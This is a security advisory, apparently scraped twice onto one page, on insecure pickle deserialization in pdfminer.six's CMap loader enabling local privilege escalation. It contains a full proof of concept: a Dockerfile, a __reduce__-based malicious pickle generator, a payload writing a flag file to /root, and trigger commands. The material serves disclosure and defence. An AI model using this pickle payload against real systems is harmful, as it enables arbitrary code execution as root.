Headline

GHSA-f83h-ghpp-7wcc: Insecure Deserialization (pickle) in pdfminer.six CMap Loader — Local Privesc

Overview

This report demonstrates a real-world privilege escalation vulnerability in pdfminer.six due to unsafe usage of Python’s pickle module for CMap file loading.
It shows how a low-privileged user can gain root access (or escalate to any service account) by exploiting insecure deserialization in a typical multi-user or server environment.

Background
Vulnerability Description
Demo Scenario
Technical Details
Setup and Usage
Step-by-step Walkthrough
Security Standards & References

Background

pdfminer.six is a popular Python library for extracting text and information from PDF files. It supports CJK (Chinese, Japanese, Korean) fonts via external CMap files, which it loads from disk using Python’s pickle module.

Security Issue:
If the CMap search path (CMAP_PATH or default directories) includes a world-writable or user-writable directory, an attacker can place a malicious .pickle.gz file that will be loaded and deserialized by pdfminer.six, leading to arbitrary code execution.

Vulnerability Description

Component: pdfminer.six CMap loading (pdfminer/cmapdb.py)
Issue: Loads and deserializes .pickle.gz files using Python’s pickle module, which is unsafe for untrusted data.
Exploitability: If a low-privileged user can write to any directory in CMAP_PATH, they can execute code as the user running pdfminer—potentially root or a privileged service.
Impact: Full code execution as the service user, privilege escalation from user to root, persistence, and potential lateral movement.

Demo Scenario

Environment:

Alpine Linux (Docker container)
Two users:
- user1 (attacker: low-privilege)
- root (victim: runs privileged PDF-processing script)
Shared writable directory: /tmp/uploads
CMAP_PATH set to /tmp/uploads for the privileged script
pdfminer.six installed system-wide

Attack Flow:

user1 creates a malicious CMap file (Evil.pickle.gz) in /tmp/uploads.
The privileged service (root) processes a PDF or calls get_cmap("Evil").
The malicious pickle is deserialized, running arbitrary code as root.
The exploit creates a flag file in /root/pwnedByPdfminer as proof.

Technical Details

Vulnerability Type: Insecure deserialization of untrusted data using Python’s pickle
Attack Prerequisites: Attacker can write to a directory included in CMAP_PATH

Vulnerable Line:

return type(str(name), (), pickle.loads(gzfile.read()))

In pdfminer/cmapdb.py's _load_data method

https://github.com/pdfminer/pdfminer.six/blob/20250506/pdfminer/cmapdb.py#L246
Proof of Concept: See createEvilPickle.py, evilmod.py, and processPdf.py

Exploit Chain:

Attacker places a malicious .pickle.gz file in the CMap search path.
Privileged process (e.g., root) loads a CMap, triggering pickle deserialization.
Arbitrary code executes with the privilege of the process (root/service account).

Setup and Usage

📁 Files

</> Dockerfile

FROM python:3.11-alpine

# Install required packages and create users
RUN adduser -D user1 && mkdir -p /tmp/uploads && chown user1:user1 /tmp/uploads

WORKDIR /app

# Install pdfminer.six
RUN pip install --no-cache-dir pdfminer.six

# Copy app files
COPY evilmod.py /app/evilmod.py
COPY createEvilPickle.py /app/createEvilPickle.py
COPY processPDF.py /app/processPDF.py

# Set up permissions for demo
RUN chmod 777 /tmp/uploads

# Default: drop into a shell for demo instructions
CMD ["/bin/sh"]

</> evilmod.py

import os

def evilFunc():
    with open("/root/pwnedByPdfminer", "w") as f:
        f.write("ROOTED by pdfminer pickle RCE\n")
    return {"CODE2CID": {}, "IS_VERTICAL": False}

</> createEvilPickle.py

import pickle
import gzip
from evilmod import evilFunc

class Evil:
    def __reduce__(self):
        return (evilFunc, ())

payload = pickle.dumps(Evil())
with gzip.open("/tmp/uploads/Evil.pickle.gz", "wb") as f:
    f.write(payload)

print("Malicious pickle created at /tmp/uploads/Evil.pickle.gz")

</> processPDF.py

import os
from pdfminer.cmapdb import CMapDB

os.environ["CMAP_PATH"] = "/tmp/uploads"

CMapDB.get_cmap("Evil")

print("CMap loaded. If vulnerable, /root/pwnedByPdfminer will be created.")

Build and start the demo container

docker build -t pdfminer-priv-esc-demo .
docker run --rm -it --name pdfminer-demo pdfminer-priv-esc-demo

In the container, open two shells in parallel (or switch users in one):

Shell 1 (Attacker: user1)

su user1
cd /app
python createEvilPickle.py
# Confirms: /tmp/uploads/Evil.pickle.gz is created and owned by user1

Shell 2 (Victim: root)

cd /app
python processPdf.py
# Output: If vulnerable, /root/pwnedByPdfminer will be created

Proof of escalation

cat /root/pwnedByPdfminer
# 🏴 Output: ROOTED by pdfminer pickle RCE

Step-by-step Walkthrough

user1 uses createEvilPickle.py to craft and place a malicious CMap pickle in a shared upload directory.
The root user runs a typical PDF-processing script, which loads CMap files from that directory.
The exploit triggers, running arbitrary code as root.
The attacker now has proof of code execution as root (and, in a real attack, could escalate further).

Security Standards & References

OWASP Top 10:
- A08:2021 - Software and Data Integrity Failures
- A03:2021 - Injection (by analogy, as it’s code injection via deserialization)
MITRE ATT&CK Techniques:
- T1055: Process Injection
- T1548: Abuse Elevation Control Mechanism

line

3 months ago

ghsa

Open in Source

#vulnerability #linux #git #rce #pdf #docker

Overview

This report demonstrates a real-world privilege escalation vulnerability in pdfminer.six due to unsafe usage of Python’s pickle module for CMap file loading.
It shows how a low-privileged user can gain root access (or escalate to any service account) by exploiting insecure deserialization in a typical multi-user or server environment.

Table of Contents

Background
Vulnerability Description
Demo Scenario
Technical Details
Setup and Usage
Step-by-step Walkthrough
Security Standards & References

Background

Security Issue:
If the CMap search path (CMAP_PATH or default directories) includes a world-writable or user-writable directory, an attacker can place a malicious .pickle.gz file that will be loaded and deserialized by pdfminer.six, leading to arbitrary code execution.

Vulnerability Description

Component: pdfminer.six CMap loading (pdfminer/cmapdb.py)
Issue: Loads and deserializes .pickle.gz files using Python’s pickle module, which is unsafe for untrusted data.
Exploitability: If a low-privileged user can write to any directory in CMAP_PATH, they can execute code as the user running pdfminer—potentially root or a privileged service.
Impact: Full code execution as the service user, privilege escalation from user to root, persistence, and potential lateral movement.

Demo Scenario

Environment:

Alpine Linux (Docker container)
Two users:
- user1 (attacker: low-privilege)
- root (victim: runs privileged PDF-processing script)
Shared writable directory: /tmp/uploads
CMAP_PATH set to /tmp/uploads for the privileged script
pdfminer.six installed system-wide

Attack Flow:

user1 creates a malicious CMap file (Evil.pickle.gz) in /tmp/uploads.
The privileged service (root) processes a PDF or calls get_cmap(“Evil”).
The malicious pickle is deserialized, running arbitrary code as root.
The exploit creates a flag file in /root/pwnedByPdfminer as proof.

Technical Details

Vulnerability Type: Insecure deserialization of untrusted data using Python’s pickle
Attack Prerequisites: Attacker can write to a directory included in CMAP_PATH
Vulnerable Line:

return type(str(name), (), pickle.loads(gzfile.read()))

_In pdfminer/cmapdb.py’s load_data method
https://github.com/pdfminer/pdfminer.six/blob/20250506/pdfminer/cmapdb.py#L246
Proof of Concept: See createEvilPickle.py, evilmod.py, and processPdf.py

Exploit Chain:

Attacker places a malicious .pickle.gz file in the CMap search path.
Privileged process (e.g., root) loads a CMap, triggering pickle deserialization.
Arbitrary code executes with the privilege of the process (root/service account).

Setup and Usage****📁 Files****</> Dockerfile

FROM python:3.11-alpine

Install required packages and create users

RUN adduser -D user1 && mkdir -p /tmp/uploads && chown user1:user1 /tmp/uploads

WORKDIR /app

Install pdfminer.six

RUN pip install --no-cache-dir pdfminer.six

Copy app files

COPY evilmod.py /app/evilmod.py COPY createEvilPickle.py /app/createEvilPickle.py COPY processPDF.py /app/processPDF.py

Set up permissions for demo

RUN chmod 777 /tmp/uploads

Default: drop into a shell for demo instructions

CMD [“/bin/sh”]

</> evilmod.py

import os

def evilFunc(): with open("/root/pwnedByPdfminer", “w”) as f: f.write(“ROOTED by pdfminer pickle RCE\n”) return {"CODE2CID": {}, "IS_VERTICAL": False}

</> createEvilPickle.py

import pickle import gzip from evilmod import evilFunc

class Evil: def __reduce__(self): return (evilFunc, ())

payload = pickle.dumps(Evil()) with gzip.open("/tmp/uploads/Evil.pickle.gz", “wb”) as f: f.write(payload)

print(“Malicious pickle created at /tmp/uploads/Evil.pickle.gz”)

</> processPDF.py

import os from pdfminer.cmapdb import CMapDB

os.environ[“CMAP_PATH”] = “/tmp/uploads”

CMapDB.get_cmap(“Evil”)

print(“CMap loaded. If vulnerable, /root/pwnedByPdfminer will be created.”)

Build and start the demo container

docker build -t pdfminer-priv-esc-demo . docker run --rm -it --name pdfminer-demo pdfminer-priv-esc-demo

In the container, open two shells in parallel (or switch users in one):****Shell 1 (Attacker: user1)

su user1 cd /app python createEvilPickle.py

Confirms: /tmp/uploads/Evil.pickle.gz is created and owned by user1

Shell 2 (Victim: root)

cd /app python processPdf.py

Output: If vulnerable, /root/pwnedByPdfminer will be created

Proof of escalation

cat /root/pwnedByPdfminer

🏴 Output: ROOTED by pdfminer pickle RCE

Step-by-step Walkthrough

user1 uses createEvilPickle.py to craft and place a malicious CMap pickle in a shared upload directory.
The root user runs a typical PDF-processing script, which loads CMap files from that directory.
The exploit triggers, running arbitrary code as root.
The attacker now has proof of code execution as root (and, in a real attack, could escalate further).

Security Standards & References

OWASP Top 10:
- A08:2021 - Software and Data Integrity Failures
- A03:2021 - Injection (by analogy, as it’s code injection via deserialization)
MITRE ATT&CK Techniques:
- T1055: Process Injection
- T1548: Abuse Elevation Control Mechanism

References